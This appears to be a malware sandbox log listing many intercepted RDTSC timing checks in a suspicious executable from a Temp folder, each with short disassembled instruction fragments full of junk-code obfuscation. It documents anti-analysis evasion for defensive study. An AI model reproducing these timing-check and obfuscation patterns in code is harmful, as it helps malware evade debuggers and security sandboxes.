Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E129AD second address: E129D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FC4CCEF6AE0h 0x0000000f jbe 00007FC4CCEF6AD6h 0x00000015 jmp 00007FC4CCEF6ADAh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E182EF second address: E18328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FC4CC910596h 0x0000000c pushad 0x0000000d jmp 00007FC4CC910599h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E184B4 second address: E184BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E26D19 second address: E26D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E28F09 second address: E28F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E366AC second address: E366B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E366B3 second address: E366C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC4CCEF6ADAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E364EB second address: E364FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC91058Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E364FE second address: E36506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E392F3 second address: E392F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E3AF24 second address: E3AF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E53EFC second address: E53F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC4CC910586h 0x0000000a popad 0x0000000b jmp 00007FC4CC910591h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E54332 second address: E54347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC4CCEF6AD6h 0x0000000a jc 00007FC4CCEF6AD6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E54347 second address: E5434B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E5446D second address: E54471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E545BD second address: E545CA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC4CC910586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E57353 second address: E57357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E58A71 second address: E58AA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910597h 0x00000007 jmp 00007FC4CC910591h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0D79 second address: 4DB0DA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC4CCEF6AE5h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0DA0 second address: 4DB0DE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 81C2h 0x00000007 push edi 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FC4CC910594h 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop eax 0x00000018 jmp 00007FC4CC910599h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0DE1 second address: 4DB0DE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0DE7 second address: 4DB0DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0DEB second address: 4DB0DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0CD4 second address: 4DA0CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0CD8 second address: 4DA0D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FC4CCEF6AE7h 0x0000000d mov ebp, esp 0x0000000f jmp 00007FC4CCEF6AE6h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FC4CCEF6ADDh 0x0000001e or al, 00000056h 0x00000021 jmp 00007FC4CCEF6AE1h 0x00000026 popfd 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0D39 second address: 4DA0D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0D3F second address: 4DA0D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DE0737 second address: 4DE073B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DE073B second address: 4DE0741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D800E7 second address: 4D800ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D800ED second address: 4D8018E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FC4CCEF6ADCh 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FC4CCEF6AE7h 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 call 00007FC4CCEF6AE4h 0x0000001e pushfd 0x0000001f jmp 00007FC4CCEF6AE2h 0x00000024 sbb ax, 74B8h 0x00000029 jmp 00007FC4CCEF6ADBh 0x0000002e popfd 0x0000002f pop ecx 0x00000030 push ebx 0x00000031 pushfd 0x00000032 jmp 00007FC4CCEF6AE4h 0x00000037 add ecx, 4195AF18h 0x0000003d jmp 00007FC4CCEF6ADBh 0x00000042 popfd 0x00000043 pop esi 0x00000044 popad 0x00000045 push dword ptr [ebp+04h] 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov cx, 20C7h 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D8018E second address: 4D80193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0A74 second address: 4DA0A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0A7A second address: 4DA0A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0A7E second address: 4DA0AC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FC4CCEF6ADEh 0x00000011 push eax 0x00000012 pushad 0x00000013 mov ch, dh 0x00000015 mov dx, si 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a jmp 00007FC4CCEF6AE4h 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0AC4 second address: 4DA0AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC4CC910593h 0x0000000a and cx, 80DEh 0x0000000f jmp 00007FC4CC910599h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0AFC second address: 4DA0B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4CCEF6ADCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0B0C second address: 4DA0B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0642 second address: 4DA0648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0648 second address: 4DA064C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA064C second address: 4DA06A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC4CCEF6ADFh 0x00000010 adc ah, 0000004Eh 0x00000013 jmp 00007FC4CCEF6AE9h 0x00000018 popfd 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC4CCEF6AE8h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA06A0 second address: 4DA06A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA06A6 second address: 4DA06AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA06AA second address: 4DA06AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DE06A6 second address: 4DE06DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov dl, 40h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c mov esi, edx 0x0000000e mov edx, 66A1A4ECh 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FC4CCEF6ADBh 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC4CCEF6AE5h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0F65 second address: 4DA0F9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910592h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC4CC91058Bh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC4CC910595h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0F9F second address: 4DA0FA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0FA5 second address: 4DA0FD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov esi, edx 0x0000000d mov di, 5E84h 0x00000011 popad 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007FC4CC910594h 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0FD2 second address: 4DA0FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DC00DD second address: 4DC00E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DC00E3 second address: 4DC00E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DC00E7 second address: 4DC0105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC4CC910593h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DC0105 second address: 4DC010B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DC010B second address: 4DC010F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DC010F second address: 4DC01C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC4CCEF6AE4h 0x00000015 add ax, 3C78h 0x0000001a jmp 00007FC4CCEF6ADBh 0x0000001f popfd 0x00000020 mov ah, 57h 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 mov bx, 6254h 0x0000002a pushfd 0x0000002b jmp 00007FC4CCEF6ADDh 0x00000030 sbb ecx, 4292A516h 0x00000036 jmp 00007FC4CCEF6AE1h 0x0000003b popfd 0x0000003c popad 0x0000003d mov eax, dword ptr [ebp+08h] 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007FC4CCEF6AE3h 0x00000049 sbb cx, CE4Eh 0x0000004e jmp 00007FC4CCEF6AE9h 0x00000053 popfd 0x00000054 jmp 00007FC4CCEF6AE0h 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DC01C5 second address: 4DC01CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0450 second address: 4DA0456 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0456 second address: 4DA0485 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC4CC91058Ch 0x00000009 or cl, 00000058h 0x0000000c jmp 00007FC4CC91058Bh 0x00000011 popfd 0x00000012 mov bh, ah 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push ebx 0x0000001c pop eax 0x0000001d mov dx, 6F1Eh 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0485 second address: 4DA0494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4CCEF6ADBh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA0494 second address: 4DA04B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC4CC910597h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA04B8 second address: 4DA04D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA04D5 second address: 4DA04DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DA04DB second address: 4DA0500 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop eax 0x00000012 mov dx, 6FA2h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0C60 second address: 4DB0C72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4CC91058Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0C72 second address: 4DB0CA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FC4CCEF6AE6h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0CA1 second address: 4DB0CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0CA5 second address: 4DB0CAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0CAB second address: 4DB0CB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0CB1 second address: 4DB0CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0CB5 second address: 4DB0CB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0CB9 second address: 4DB0CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FC4CCEF6ADDh 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC4CCEF6AE8h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0CED second address: 4DB0CF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0CF1 second address: 4DB0CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0CF7 second address: 4DB0D38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 5Ch 0x00000005 pushfd 0x00000006 jmp 00007FC4CC910599h 0x0000000b or ecx, 2720C416h 0x00000011 jmp 00007FC4CC910591h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
